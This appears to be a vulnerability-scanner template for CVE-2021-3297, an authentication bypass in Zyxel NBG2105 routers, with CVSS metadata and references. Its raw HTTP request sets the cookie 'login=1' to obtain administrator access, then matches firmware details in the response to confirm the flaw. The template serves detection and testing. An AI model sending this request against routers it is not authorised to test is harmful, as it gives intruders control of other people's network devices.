id: CVE-2021-3297 info: name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass author: gy741 severity: high description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3297 cwe-id: CWE-287 tags: cve,cve2021,zyxel,auth-bypass,router requests: - raw: - | GET /status.htm HTTP/1.1 Host: {{Hostname}} Cookie: language=en; login=1 matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "Running Time" - "Firmware Version" - "Firmware Build Time" condition: and